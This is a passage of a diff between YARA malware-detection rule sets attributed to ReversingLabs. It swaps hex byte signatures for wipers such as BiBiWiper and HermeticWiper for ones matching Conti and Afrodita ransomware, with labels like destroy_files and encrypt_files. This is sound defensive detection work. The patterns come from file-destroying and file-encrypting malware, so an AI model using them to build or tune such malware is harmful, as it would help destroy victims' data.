-            ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47
-            ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ??
-            6A ?? 5A 3A 47 ?? 75 ?? 8A 45 ?? 6A ?? 5A 3A 47 ?? 75 ?? 8D 0C 3A 2B EF 42 41 3B D3
-            73 ?? 8A 04 29 3A 01 74 ?? 8B 5C 24 ?? 83 EA ?? 83 FA ?? 73 ?? 8B CB 8A C2 C1 F9 ??
-            C0 E0 ?? 02 C8 88 0E 46 EB ?? 8B C3 C1 F8 ?? 2C ?? 88 06 8D 42 ?? 88 46 ?? 83 C6 ??
-            8B 7C 24 ?? 8B 44 24 ?? 47 88 1E 03 FA 33 DB 83 C6 ?? 3B F8 72 ?? 8B 6C 24 ?? 8D 46
-            ?? 3B 44 24 ?? 76 ?? 33 C0 EB ?? 3B 74 24 ?? 73 ?? 8A 07 43 88 06 46 8B 44 24 ?? 47
-            83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B F8 73 ?? 8B 54 24 ?? E9 ?? ?? ?? ?? 8A 07 43
-            88 06 46 47 83 FB ?? 75 ?? C6 46 ?? ?? 33 DB 46 3B FD 72 ?? 8B CE 8D 53 ?? 2B CB 88
-            51 ?? 33 C9 85 DB 0F 94 C1 2B F1 2B 74 24 ?? 8B C6 5F 5E 5D 5B 83 C4 ?? C3
+		$find_files_p3 = {
+            4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 3B FB 7D ?? 81 FE ?? ?? ?? ??
+            76 ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? 83 7D ?? ?? 8B 45 ?? 0F 43 4D
+            ?? 8D 04 41 50 51 8D 45 ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? ?? ?? C6 45
+            ?? ?? 56 BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ??
+            ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 50 8D 4D ?? C6 45 ?? ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ??
+            ?? BA ?? ?? ?? ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 55 ?? 8B C8 E8 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 45 ?? 83 7D ?? ?? 51 0F 43 45 ?? 51 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 56 BA ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? C7 04 24 ?? ?? ?? ?? 50 8D 85 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85
         }
-		$decrypt_resource_snippet_v7 = {
-            C1 EE ?? 3B F9 0F 47 F0 85 F6 74 ?? 8B 5C 24 ?? 8B 0F 8D 7F ?? 33 CB 0F B6 C1 66 89
-            02 8B C1 C1 E8 ?? 8D 52 ?? 0F B6 C0 66 89 42 ?? C1 E9 ?? 0F B6 C1 C1 E9 ?? 45 66 89
-            42 ?? 0F B6 C1 66 89 42 ?? 3B EE 72 ?? 8B 5C 24 ?? 8B 44 24 ?? 33 C9 5D 66 89 0C 43
-            5F 5E 8B C3 5B 83 C4 ?? C3
+		$find_files_p4 = {
+            50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 8B C8 C6 45 ?? ?? E8 ?? ?? ?? ?? 50 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? ?? 50 8D 85 ??
+            ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B D0 C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 8B 45
+            ?? 8D 4D ?? 51 3B 45 ?? 74 ?? 8B C8 E8 ?? ?? ?? ?? 83 45 ?? ?? EB ?? 50 8D 4D ?? E8
+            ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 9D ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 FF 15 ??
+            ?? ?? ?? 8B 7D ?? 8B 75 ?? 6A ?? 5B 3B F7 74 ?? 56 E8 ?? ?? ?? ?? 03 F3 59 3B F7 75
+            ?? 8B 7D ?? 8B 75 ?? 85 F6 74 ?? 3B F7 74 ?? 8B CE E8 ?? ?? ?? ?? 03 F3 3B F7 75 ??
+            8B 75 ?? 8B 45 ?? 2B C6 99 F7 FB 6B C0 ?? 50 56 E8 ?? ?? ?? ?? 59 59 8D 4D ?? E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
         }
-		$state_machine_snippet_v7 = {
-            8D 84 24 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B
-            94 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24
-            ?? ?? ?? ?? 50 68 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 54 24 ??
-            8B 8C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? 8D 94
-            24 ?? ?? ?? ?? 89 84 24 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? FF 74 24
-            ?? 8B F0 FF B4 24 ?? ?? ?? ?? 8B 8C 24 ?? ?? ?? ?? F7 DE 8B 94 24 ?? ?? ?? ?? 1B F6
-            81 E6 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF B4 24 ?? ?? ?? ?? FF B4 24 ??
-            ?? ?? ?? 8B 94 24 ?? ?? ?? ?? 8B 4C 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? E9
+		$encrypt_files = {
+            8B FF 55 8B EC 57 FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B F8 8B 49 ?? 90 F6 C1 ?? 75
+            ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ?? ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? E9
+            ?? ?? ?? ?? 8B 45 ?? 8B 40 ?? 90 C1 E8 ?? A8 ?? 74 ?? E8 ?? ?? ?? ?? C7 00 ?? ?? ??
+            ?? EB ?? 8B 45 ?? 8B 40 ?? 90 A8 ?? 74 ?? FF 75 ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 83 61
+            ?? ?? 84 C0 8B 45 ?? 74 ?? 8B 48 ?? 89 08 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45
+            ?? 53 6A ?? 5B 83 C0 ?? F0 09 18 8B 45 ?? 6A ?? 59 83 C0 ?? F0 21 08 8B 45 ?? 83 60
+            ?? ?? 8B 45 ?? 8B 40 ?? 90 A9 ?? ?? ?? ?? 75 ?? 56 8B 75 ?? 6A ?? E8 ?? ?? ?? ?? 59
+            3B F0 74 ?? 8B 75 ?? 53 E8 ?? ?? ?? ?? 59 3B F0 75 ?? 57 E8 ?? ?? ?? ?? 59 85 C0 75
+            ?? FF 75 ?? E8 ?? ?? ?? ?? 59 5E FF 75 ?? 8B 5D ?? 53 E8 ?? ?? ?? ?? 59 59 84 C0 75
+            ?? 8B 45 ?? 6A ?? 59 83 C0 ?? F0 09 08 83 C8 ?? EB ?? 0F B6 C3 5B 5F 5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $decrypt_resource_v1 and $generate_filename_v1 ) or ( $decrypt_resource_v2 and $generate_filename_v2 ) or ( $decrypt_resource_v3 and $generate_filename_v3 ) or ( $decrypt_resource_v4 and $generate_filename_snippet_v4 ) or ( $decrypt_resource_snippet_v5 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v6 and all of ( $liblzf_decompression_* ) ) or ( $decrypt_resource_snippet_v7 and $state_machine_snippet_v7 )
+		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( $encrypt_files ) and ( all of ( $remote_connection_p* ) )
 }
-rule REVERSINGLABS_Linux_Trojan_Bibiwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Conti : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects BiBiWiper trojan."
+		description = "Yara rule that detects Conti ransomware."
 		author = "ReversingLabs"
-		id = "c370dde0-71ff-5832-b131-6d61beb02b9b"
-		date = "2023-11-28"
-		modified = "2023-11-28"
+		id = "548b8836-83cb-560c-af5f-33bdb24d15ed"
+		date = "2020-12-14"
+		modified = "2020-12-14"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Linux.Trojan.BiBiWiper.yara#L1-L76"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Conti.yara#L1-L74"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8f290141d5da660463dede6df571d774448e136e2993a0a4c706245464e1239e"
+		logic_hash = "4f2b96c8eaf8d112a7bb60647db49616935a336396c705d39d5bb51dfd90c60b"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "BiBiWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Conti"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$destroy_files_p1 = {
-            55 48 89 E5 53 48 81 EC ?? ?? ?? ?? 48 89 BD ?? ?? ?? ?? 48 89 B5 ?? ?? ?? ?? 48 89
-            95 ?? ?? ?? ?? 48 89 8D ?? ?? ?? ?? 4C 89 85 ?? ?? ?? ?? 44 89 8D ?? ?? ?? ?? 48 8B
-            05 ?? ?? ?? ?? 48 83 C0 ?? 48 89 05 ?? ?? ?? ?? 48 8B 0D ?? ?? ?? ?? 48 BA ?? ?? ??
-            ?? ?? ?? ?? ?? 48 89 C8 48 F7 EA 48 89 D0 48 C1 F8 ?? 48 89 CA 48 C1 FA ?? 48 29 D0
-            48 69 D0 ?? ?? ?? ?? 48 89 C8 48 29 D0 48 85 C0 0F 94 C0 84 C0 74 ?? E8 ?? ?? ?? ??
-            48 8B 85 ?? ?? ?? ?? 48 89 85 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 89
-            D6 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ??
-            ?? 48 8D 85 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 CE 48 89 C7
-            E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 8D ?? ?? ?? ?? 48 89
-            CE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ??
-            ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D
-            8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ??
-            48 8D 8D ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ??
-            ?? ?? 48 8D 95 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 D6 48 89 C7 E8 ?? ?? ?? ?? 48
-            89 C3 48 8D 8D ?? ?? ?? ?? 48 8D 45 ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ??
-            ?? 48 8D 45 ?? 48 89 DE 48 89 C7 E8 ?? ?? ?? ?? 48 8D 45 ?? 48 89 C7 E8
+		$find_files = {
+            55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? 53 56 57 8B D9 53 FF 15 ?? ?? ?? ?? 89 44 24 ??
+            8D 0C 45 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 89 7C 24 ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 44
+            24 ?? B9 ?? ?? ?? ?? 53 BE ?? ?? ?? ?? 57 66 83 7C 43 ?? ?? 0F 45 F1 FF 15 ?? ?? ??
+            ?? 56 57 FF 15 ?? ?? ?? ?? 8B CB E8 ?? ?? ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ??
+            8B F8 83 FF ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85
+            C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? F6 44 24 ?? ?? 74 ?? 8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B
+            CB E8 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 8B CE E8 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? EB ??
+            8D 4C 24 ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 8D 54 24 ?? 8B CB E8 ?? ?? ?? ?? 8B F0 85 F6
+            74 ?? 68 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 6A ?? 5A 8B C8 C6 01 ?? 41
+            83 EA ?? 75 ?? 83 48 ?? ?? 50 89 70 ?? A1 ?? ?? ?? ?? 52 6A ?? FF 70 ?? FF 15 ?? ??
+            ?? ?? 8D 44 24 ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 4C 24 ?? E8 ??
+            ?? ?? ?? 83 FF ?? 74 ?? 57 FF 15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
         }
-		$destroy_files_p2 = {
-            48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ??
-            ?? ?? 48 8B 85 ?? ?? ?? ?? 48 C1 E0 ?? 48 89 45 ?? 48 8B B5 ?? ?? ?? ?? 48 8B 85 ??
-            ?? ?? ?? BA ?? ?? ?? ?? 48 F7 F6 48 8B 55 ?? 48 29 D0 48 89 45 ?? 83 BD ?? ?? ?? ??
-            ?? 7E ?? 8B 85 ?? ?? ?? ?? 83 E8 ?? 48 98 48 0F AF 45 ?? BA ?? ?? ?? ?? 48 F7 B5 ??
-            ?? ?? ?? 48 89 D0 48 89 C1 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8
-            ?? ?? ?? ?? EB ?? 48 8B 85 ?? ?? ?? ?? BA ?? ?? ?? ?? BE ?? ?? ?? ?? 48 89 C7 E8 ??
-            ?? ?? ?? 48 8B 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 45 ?? 48 39
-            85 ?? ?? ?? ?? 73 ?? BB ?? ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ??
-            48 29 D0 48 89 45 ?? 48 8B 45 ?? 48 89 45 ?? 48 8D 55 ?? 48 8D 45 ?? 48 89 D6 48 89
-            C7 E8 ?? ?? ?? ?? 48 8B 00 48 89 45 ?? 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45
-            ?? 48 8B 45 ?? 89 C2 48 8D 85 ?? ?? ?? ?? 89 D6 48 89 C7 E8 ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? E9 ?? ?? ?? ?? 48 8B 5D ?? 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48
+		$encrypt_files_p1 = {
+            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 BB ?? ?? ?? ?? 8B F9 53 57 FF 15 ?? ?? ?? ?? 85
+            C0 0F 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ??
+            A1 ?? ?? ?? ?? 83 F8 ?? 75 ?? 89 75 ?? 33 F6 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? FF 74 B5 ?? 57 FF 15 ?? ?? ??
+            ?? 85 C0 75 ?? 46 83 FE ?? 7C ?? 33 C0 40 EB ?? 85 C0 75 ?? 8B 35 ?? ?? ?? ?? BB ??
+            ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 00 ?? 40 83 E9 ?? 75 ?? 53 56 FF 15 ??
+            ?? ?? ?? 85 C0 74 ?? 2B C6 D1 F8 74 ?? 85 C0 78 ?? 40 50 56 8D 85 ?? ?? ?? ?? 50 FF
+            15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 53 56 FF 15 ??
+            ?? ?? ?? 8B F0 85 F6 74 ?? 83 C6 ?? EB ?? 33 C0 5F 5E 5B C9 C3
         }
-		$destroy_files_p3 = {
-            89 C7 48 8B 85 ?? ?? ?? ?? 48 89 C1 BA ?? ?? ?? ?? 48 89 DE E8 ?? ?? ?? ?? 48 8B 85
-            ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 45 ?? 48 8B 55 ?? 48 8B 45 ?? 48 01 C2 48
-            8B 45 ?? 48 01 D0 48 39 85 ?? ?? ?? ?? 73 ?? 48 8B 55 ?? 48 8B 85 ?? ?? ?? ?? 48 29
-            D0 48 8B 55 ?? 48 29 D0 48 89 45 ?? 48 83 7D ?? ?? 7E ?? 48 8B 4D ?? 48 8B 85 ?? ??
-            ?? ?? BA ?? ?? ?? ?? 48 89 CE 48 89 C7 E8 ?? ?? ?? ?? 83 45 ?? ?? 8B 45 ?? 48 98 48
-            39 85 ?? ?? ?? ?? 0F 8F ?? ?? ?? ?? EB ?? 90 48 8B 45 ?? 48 89 C7 E8 ?? ?? ?? ?? 48
-            8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? 83 FB ?? E9 ?? ?? ?? ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8
-            ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89
-            C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48
-            89 C3 48 8D 45 ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89
-            C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ??
-            48 89 C3 48 8D 85 ?? ?? ?? ?? 48 89 C7 E8 ?? ?? ?? ?? EB ?? 48 89 C3 48 8D 85 ?? ??
-            ?? ?? 48 89 C7 E8 ?? ?? ?? ?? 48 89 D8 48 89 C7 E8 ?? ?? ?? ?? 48 8B 5D ?? C9 C3
+		$encrypt_files_p2 = {
+            55 8B EC 83 EC ?? 53 56 57 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 DB 53 FF 15 ?? ??
+            ?? ?? 8B F8 85 FF 75 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 5E 56 68 ?? ?? ??
+            ?? 53 8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53
+            8D 45 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45
+            ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 ?? ?? ?? ?? 56 68 ?? ?? ?? ?? 53 8D 45 ?? 50
+            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 45 ?? 50 53 53 68 ?? ?? ??
+            ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? FF 15 ?? ?? ?? ?? 6A
+            ?? 8D 45 ?? 50 8D 45 ?? 50 8D 45 ?? 50 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ?? 85 C0 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 81 7D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? FF 75 ?? 8B 4D ??
+            8B D7 FF 75 ?? E8 ?? ?? ?? ?? 59 59 85 C0 74 ?? 8B 45 ?? FF 70 ?? FF 15 ?? ?? ?? ??
+            8B 45 ?? B9 ?? ?? ?? ?? 83 48 ?? ?? 8B 45 ?? 8B 58 ?? E8 ?? ?? ?? ?? 8B F0 85 F6 74
+            ?? 53 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 56 53 FF 15 ?? ?? ??
+            ?? 8B CE E8 ?? ?? ?? ?? 8B 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 8B 49 ?? E8 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 57 FF 15 ?? ?? ?? ?? FF
+            75 ?? FF 15 ?? ?? ?? ?? 6A ?? FF 15 ?? ?? ?? ?? 5F 5E 33 C0 5B C9 C2
         }
 
 	condition:
-		uint32( 0 ) == 0x464C457F and ( all of ( $destroy_files_p* ) )
+		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( all of ( $encrypt_files_p* ) )
 }
-rule REVERSINGLABS_Win32_Trojan_Hermeticwiper : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win32_Ransomware_Afrodita : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects HermeticWiper trojan."
+		description = "Yara rule that detects Afrodita ransomware."
 		author = "ReversingLabs"
-		id = "252dfb3d-9d4e-51a4-80c9-64e17922d997"
-		date = "2022-02-24"
-		modified = "2022-02-24"
+		id = "513963fd-5f3d-5d31-a65a-37f6f5c72260"
+		date = "2020-06-26"
+		modified = "2020-07-15"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/trojan/Win32.Trojan.HermeticWiper.yara#L1-L50"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.Afrodita.yara#L1-L119"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "0fa519ce8285ffe4e49c2a301e8a0fd0516a05dc6b41ee0b010fdc76dd6e195e"
+		logic_hash = "ce7cc445d4c1f59c25b9505fc1f7f9dd0d286ab80510e2977b50ff15433aea60"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Trojan"
-		tc_detection_name = "HermeticWiper"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Afrodita"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$corrupt_physical_drive = {
-            55 8B EC 81 EC ?? ?? ?? ?? 53 56 57 51 68 ?? ?? ?? ?? 0F 57 C0 89 55 ?? 8D 85 ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 66 0F D6 45 ?? 33 FF 89 75 ?? 50 0F
-            11 45 ?? 89 7D ?? 0F 11 45 ?? FF 15 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 8D 55 ?? 8D 8D ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B D8 83 FB ?? 0F 84 ?? ?? ?? ?? 85 DB 0F 84 ?? ?? ?? ??
-            BF ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 6A ?? 8B F0 8D 45 ??
-            50 57 56 6A ?? 6A ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ??
-            75 ?? 66 0F 1F 44 00 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 81 C7 ?? ??
-            ?? ?? 33 F6 81 FF ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 57 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 57 56 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 53 FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 F6 0F 84 ?? ?? ??
-            ?? 8B 06 C7 45 ?? ?? ?? ?? ?? 83 F8 ?? 74 ?? 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            83 7E ?? ?? C7 45 ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 55 ?? 8D 46 ?? 89 45 ?? 66 90
-            8B 00 85 C0 74 ?? 83 F8 ?? 0F 85 ?? ?? ?? ?? 52 6A ?? FF 15 ?? ?? ?? ?? 50 FF 15 ??
-            ?? ?? ?? 8B F8 89 7D ?? 85 FF 0F 84 ?? ?? ?? ?? 8B 45 ?? 6A ?? 6A ?? FF 70 ?? FF 70
-            ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 57 53 FF
-            15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 55 ?? 81 FA ?? ?? ?? ?? 72 ?? 66 83 7F ??
-            ?? 75 ?? 85 D2 0F B7 C2 B9 ?? ?? ?? ?? 0F 45 C8 66 89 4F ?? 8B 45 ?? FF 70 ?? FF 70
